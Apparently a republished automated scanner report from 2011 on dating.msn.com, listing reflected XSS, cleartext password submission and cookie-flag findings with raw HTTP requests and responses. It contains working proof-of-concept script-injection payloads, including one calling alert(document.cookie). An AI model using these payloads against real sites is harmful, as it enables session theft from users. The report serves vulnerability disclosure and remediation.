Report generated by XSS.CX at Mon Feb 14 11:08:11 CST 2011.


XSS, Cross Site Scripting in dating.msn.com, CWE-79, CAPEC-86, DORK, GHDB

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

XSS in dating.msn.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

2. Cleartext submission of password

3. Cookie without HttpOnly flag set

3.1. http://dating.msn.com/cp.aspx

3.2. http://dating.msn.com/en-us/partner/msn/38028.html

3.3. http://dating.msn.com/index.aspx

3.4. http://dating.msn.com/profile/showprofiledl.aspx

3.5. http://dating.msn.com/qsearch/qsearchdl.aspx

3.6. http://dating.msn.com/search/index.aspx

3.7. http://dating.msn.com/

3.8. http://dating.msn.com/msn/article/articleindex.aspx

3.9. http://dating.msn.com/search/searchSubmit.aspx

4. Password field with autocomplete enabled

5. Cross-domain Referer leakage

5.1. http://dating.msn.com/cp.aspx

5.2. http://dating.msn.com/en-us/partner/msn/38028.html

5.3. http://dating.msn.com/index.aspx

5.4. http://dating.msn.com/profile/showprofiledl.aspx

5.5. http://dating.msn.com/search/index.aspx

5.6. http://dating.msn.com/search/searchSubmit.aspx

6. Cross-domain script include

6.1. http://dating.msn.com/

6.2. http://dating.msn.com/cp.aspx

6.3. http://dating.msn.com/en-us/partner/msn/38028.html

6.4. http://dating.msn.com/index.aspx

6.5. http://dating.msn.com/msn/article/articleindex.aspx

6.6. http://dating.msn.com/profile/showprofiledl.aspx

6.7. http://dating.msn.com/search/index.aspx

6.8. http://dating.msn.com/search/searchSubmit.aspx



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /qsearch/qsearchdl.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f518"><script>alert(1)</script>9e1add0d48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /qsearch/qsearchdl.aspx?8f518"><script>alert(1)</script>9e1add0d48d=1 HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:07:28 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:07:28 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:07:28 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=4ddc4bee-f718-45df-9f80-5a23bb7905bf; expires=Sun, 12-Feb-2012 02:07:28 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=eae7cef8-35b6-4e4c-97aa-295d0f2dec1e&THEME=80; path=/
Set-Cookie: msnc=1; expires=Thu, 17-Feb-2011 02:07:28 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<a href="/search/search.aspx?8f518"><script>alert(1)</script>9e1add0d48d=1&ac=1&r2s=&q=woman%2cmen%2c25%2c35&pn=1&rn=4&do=2&exec=NOGO&lid=521">
...[SNIP]...

2. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /search/searchSubmit.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET /search/searchSubmit.aspx?8f518%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9e1add0d48d=1&ac=1&r2s=&q=woman,men,25,35&st=quicksearch&pn=1&rn=4&do=2 HTTP/1.1
Host: dating.msn.com
Proxy-Connection: keep-alive
Referer: http://burp/show/5
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; Match=CCount=1&CDate=2/11/2011; MatchSession=CDTF=2/11/2011&UMID=6f02ae30-57cc-42df-bcc5-270cd7ccc6c0; SECU=TID=516068&ESID=54e6c639-4192-42c9-91e1-9a0e0bf3a18c&THEME=214; OLN=OLNVAL=0; MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=&ROF06=; msnc=1; MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: msnc=2; expires=Thu, 17-Feb-2011 02:09:46 GMT; path=/
Set-Cookie: MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; expires=Sun, 12-Feb-2012 02:09:46 GMT; path=/
Date: Sat, 12 Feb 2011 02:09:47 GMT
Content-Length: 174766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<div id="bodyWrapper" class="clearfix">
           <form name="aspnetForm" method="post" action="searchSubmit.aspx?8f518%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e9e1add0d48d=1&amp;ac=1&amp;r2s=&amp;q=woman%2cmen%2c25%2c35&amp;st=quicksearch&amp;pn=1&amp;rn=4&amp;do=2" id="aspnetForm">
<div>
...[SNIP]...
</label>
                   <input name="password" id="password" type="password" maxlength="16" />
                   <div class=" error_password fieldError ">
...[SNIP]...
</label>
                   <input name="password" id="password" type="password" maxlength="16" />
                   <div class=" error_password fieldError ">
...[SNIP]...
<dd><input name="password" id="password" maxlength="16" type="password" /></dd>
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 9 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://dating.msn.com/cp.aspx  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dating.msn.com
Path:   /cp.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cp.aspx HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 12 Feb 2011 02:07:02 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Location: /errors/ErrorPage.aspx?LOGID=104819&STAG=wec1-059fec1-004s-
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:07:01 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:07:01 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=9c87c65f-43fe-4397-a58f-db835fb2c305; expires=Sun, 12-Feb-2012 02:07:01 GMT; path=/
Set-Cookie: SECU=TID=516068; path=/
Cache-Control: private
Content-Type: text/html

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferrors%2fErrorPage.aspx%3fLOGID%3d104819%26STAG%3dwec1-059fec1-004s-">here</a>.</h2>
</body></html>

3.2. http://dating.msn.com/en-us/partner/msn/38028.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dating.msn.com
Path:   /en-us/partner/msn/38028.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/partner/msn/38028.html HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:07:02 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:07:01 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:07:01 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=441f72ce-b34f-4121-9e1f-dbdb8720d56e; expires=Sun, 12-Feb-2012 02:07:01 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=cbd24bfb-f094-4e4b-9c9f-b6435944415a&THEME=81; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52321

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4058.16142" rel="st
...[SNIP]...

3.3. http://dating.msn.com/index.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dating.msn.com
Path:   /index.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.aspx HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:06:57 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:06:57 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:06:57 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=0cfcee5e-ede5-40aa-b67a-f606291a9668; expires=Sun, 12-Feb-2012 02:06:57 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=44fc8970-3e92-4346-8555-1679a538d5ee&THEME=74; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44048

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4058.16142" rel="st
...[SNIP]...

3.4. http://dating.msn.com/profile/showprofiledl.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dating.msn.com
Path:   /profile/showprofiledl.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/showprofiledl.aspx HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 12 Feb 2011 02:07:00 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Location: /errors/ErrorPage.aspx?LOGID=104784&STAG=wec1-003fec1-004sec1-805
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:07:00 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:07:00 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=9f6ae33b-e501-4d47-a640-25d0e9f327a5; expires=Sun, 12-Feb-2012 02:07:00 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=4aedef17-7dbd-4611-9fb6-7ef185419926&THEME=214; path=/
Cache-Control: private
Content-Type: text/html

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferrors%2fErrorPage.aspx%3fLOGID%3d104784%26STAG%3dwec1-003fec1-004sec1-805">here</a>.</h2>
</body></html>

3.5. http://dating.msn.com/qsearch/qsearchdl.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dating.msn.com
Path:   /qsearch/qsearchdl.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /qsearch/qsearchdl.aspx HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 12 Feb 2011 02:07:08 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Location: /search/searchSubmit.aspx?ac=1&r2s=&q=woman,men,25,35&st=quicksearch&pn=1&rn=4&do=2
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:07:06 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:07:06 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=a7478790-6382-43ae-b62e-974c442333bb; expires=Sun, 12-Feb-2012 02:07:06 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=3b2dd779-e015-49f5-99ec-bcf65da8f1ea&THEME=81; path=/
Set-Cookie: OLN=OLNVAL=0; expires=Mon, 14-Mar-2011 01:07:08 GMT; path=/
Set-Cookie: MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=&ROF06=; expires=Sun, 12-Feb-2012 02:07:06 GMT; path=/
Set-Cookie: dMatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=&ROF06=; domain=match.com; expires=Sun, 12-Feb-2012 02:07:06 GMT; path=/
Set-Cookie: msnc=1; expires=Thu, 17-Feb-2011 02:07:08 GMT; path=/
Set-Cookie: MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; expires=Sun, 12-Feb-2012 02:07:08 GMT; path=/
Set-Cookie: dMatchSearch=SC01=2&SC02=1&SC08=75207&SC13=0&SC14=0&SC05=0&SC09=1; domain=match.com; expires=Sun, 12-Feb-2012 02:07:08 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 238

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fsearch%2fsearchSubmit.aspx%3fac%3d1%26r2s%3d%26q%3dwoman%2cmen%2c25%2c35%26st%3dquicksearch%26pn%3d1%26rn%3d4%26do
...[SNIP]...

3.6. http://dating.msn.com/search/index.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dating.msn.com
Path:   /search/index.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/index.aspx HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 12 Feb 2011 02:07:01 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/11/2011; expires=Sun, 12-Feb-2012 02:06:59 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/11/2011; domain=match.com; expires=Sun, 12-Feb-2012 02:06:59 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/11/2011&UMID=5929b972-6ddc-489d-90e7-c8992efbc98a; expires=Sun, 12-Feb-2012 02:06:59 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=1c5b6933-5943-4a1a-8ba5-e1be74751214&THEME=215; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...

3.7. http://dating.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: dating.msn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Match=CCount=1&CDate=2/11/2011; MatchSession=CDTF=2/11/2011&UMID=6f02ae30-57cc-42df-bcc5-270cd7ccc6c0; SECU=TID=516068&ESID=54e6c639-4192-42c9-91e1-9a0e0bf3a18c&THEME=214; OLN=OLNVAL=0; MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=&ROF06=; msnc=2; MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; Sample=69

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 02:14:58 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; expires=Sun, 12-Feb-2012 02:14:58 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44069

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4058.16142" rel="st
...[SNIP]...

3.8. http://dating.msn.com/msn/article/articleindex.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /msn/article/articleindex.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msn/article/articleindex.aspx HTTP/1.1
Host: dating.msn.com
Proxy-Connection: keep-alive
Referer: http://dating.msn.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Match=CCount=1&CDate=2/11/2011; MatchSession=CDTF=2/11/2011&UMID=6f02ae30-57cc-42df-bcc5-270cd7ccc6c0; SECU=TID=516068&ESID=54e6c639-4192-42c9-91e1-9a0e0bf3a18c&THEME=214; OLN=OLNVAL=0; MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=&ROF06=; msnc=2; MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; Sample=69

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; expires=Sun, 12-Feb-2012 02:15:14 GMT; path=/
Date: Sat, 12 Feb 2011 02:15:14 GMT
Content-Length: 34474

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4058.16142" rel="st
...[SNIP]...

3.9. http://dating.msn.com/search/searchSubmit.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /search/searchSubmit.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/searchSubmit.aspx?8f518%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9e1add0d48d=1&ac=1&r2s=&q=woman,men,25,35&st=quicksearch&pn=1&rn=4&do=2 HTTP/1.1
Host: dating.msn.com
Proxy-Connection: keep-alive
Referer: http://burp/show/5
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; Match=CCount=1&CDate=2/11/2011; MatchSession=CDTF=2/11/2011&UMID=6f02ae30-57cc-42df-bcc5-270cd7ccc6c0; SECU=TID=516068&ESID=54e6c639-4192-42c9-91e1-9a0e0bf3a18c&THEME=214; OLN=OLNVAL=0; MatchSearchROF=ROF01=&ROF05=&ROF02=&ROF04=&ROF03=&ROF06=; msnc=1; MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: msnc=2; expires=Thu, 17-Feb-2011 02:09:46 GMT; path=/
Set-Cookie: MatchSearch=SC08=75207&SC08a=&SC11=&SC01=2&SC02=1&SC13=0&SC14=0&SC05=0&SC09=1; expires=Sun, 12-Feb-2012 02:09:46 GMT; path=/
Date: Sat, 12 Feb 2011 02:09:47 GMT
Content-Length: 174766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...

4. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dating.msn.com
Path:   /search/searchSubmit.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Issue background

